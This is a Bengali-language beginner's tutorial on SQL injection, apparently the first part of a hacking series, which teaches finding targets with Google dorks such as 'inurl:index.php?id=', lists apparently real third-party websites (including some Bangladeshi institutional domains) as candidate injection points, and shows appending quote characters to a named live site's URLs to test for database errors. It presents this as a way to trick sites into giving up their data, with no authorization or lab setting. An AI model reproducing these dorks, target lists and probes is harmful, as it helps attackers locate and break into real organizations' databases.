# SQL কি ?
SQL হল Structured Query Language , এটা একটা বিশেষ প্রোগ্রামিং ভাষা যা ব্যাবহার করে Relational Database Management Syatem )RDBMS) এর দেতা সমূহ সম্পাদন করা হয় । এক কথাই WEB Programing কে বোকা বানিএ Database থেকে Information বের করে নেয়া, or Database access নেয়া।
# Detabase কি ?
Detabase হল এক্তা ফাইল যেখানে ওয়েবসাইট আর বিভিন্ন তথ্য সমূহ সাজানো থাকে ।জেমনঃ লাইবেরি তে সবাই বই দেখেছেন, লাইবেরি তে সব বই যেভাবে সাজানো থাকে ঠিক সেই ভাবে Database এ সব তথ্য স্তরে স্তরে সাজানো থাকে।
# SQL যেই ভাবে করা হয় __
# SQL BaSic Part = 01
•প্রথমেই SQLi করার জন্য আমাদের যে কোন সাইটের vulnerable link লাগবে ।
• URL এর শেষে যে .php?id=3 এ রকম থাকে, বেশির ভাগ সাইটেই এ যায়গায় SQLi করা যায় ।
•এখন দেখার হচ্ছে, এটা কতো রকমে থাকে , এবং পাবো কিভাবে ।
•যেভাবে পাবো,
•বিভিন্ন Dork ব্যাবহার করে, অথবা সাইটে visit করে । ( dork গুলো https://www.exploit-db.com/google-hacking-database/এই সাইট থেকে পাবেন)
• Dork গুলা যেমন হয় এবং যেভাবে DORK দিয়ে কোন সাইটের ইনজেকশন পয়েন্ট বের করা জায় ...
• inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
•আরও অনেক DORK ফাইলে দেয়া আছে, সেগুলো শুধু কপি করেgoogle.comএ গিয়ে সার্চ করবেন ।
•তাতেই আপনাকে অনেক গুলো সাইটের , ইনজেকশন পয়েন্ট সহ লিঙ্ক দিয়ে দিবে google, তবে মনে রাখবেন সব সাইটেই যে ইনজেকশন হবেই তেমন না ।
যা যা রকমে এটা থাকে,
.php?id=45
.php?id=result
.php?rsult=student
.php?catid=3
.php?p=4
.php?id=Mw== //(base64)
যেমন,
http://christukula.co.in/event.php?id=78
http://www.orascomci.com/index.php?id=talentprogram
http://www.sherrihill.com/content.php?id=registration
http://www.sciencedomain.org/page.php?id=reviewers-editors
http://www.esuprobhat.com/index.php?page=1&date=2015-03-14
http://www.aksimgroup.com/pDetails.php?pid=68
http://www.admission365.com/univ-desc.php?uid=15
http://www.baec.org.bd/dbemployee/employee_list_division.php?id=NPED
http://www.vub.edu.bd/page.php?page=22
etc .....
কোন সাইট SQLi vulnerable কি না এটা জানতে, তার id=34 ,
এই 34 er শেষে special character দিতে হয় ,
যেমন , http://eyot.co.in/product.php?id=37'
এই special character বিভিন্ন ভাবে দিয়ে, আমরা দেখতে পারি যে,
সাইট টি vulnerable কি না ।
special charecter দেয়ার পর যদি, কোন error দেয় তবে মনে করবেন যে পাইছি :D ,
error বিভিন্ন রকমে দিতে পারে,
বেশির ভাগই লেখা আশে যে ,
(Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\Inetpub\vhosts\jayapriya.com\httpdocs\gallery.php on line 11)
আবার অনেক ক্ষেত্রে সাইটে পরিবর্তন আসে , যেমন কোন ছবি নাই হয়ে যায়, বা পেজ ছোটো হয়ে যায় , অনেক কিছু ।
অদ্য কথা হচ্ছে special character দেয়ার পরে যদি সাইটে কোন রকম পরিবর্তন আসে, তবেই মনে করতে হবে যে পাইছি :D আইজকা খাইছি :p
special character এর ধরন :
যেমন ,
' , " , ') , ')) , ")) , ") , \ ,
http://eyot.co.in/product.php?id=37'
http://eyot.co.in/product.php?id=37')
http://eyot.co.in/product.php?id=37'))
http://eyot.co.in/product.php?id=37"
http://eyot.co.in/product.php?id=37")
http://eyot.co.in/product.php?id=37"))
লিখাঃ অন্যান্য লিট হ্যাকার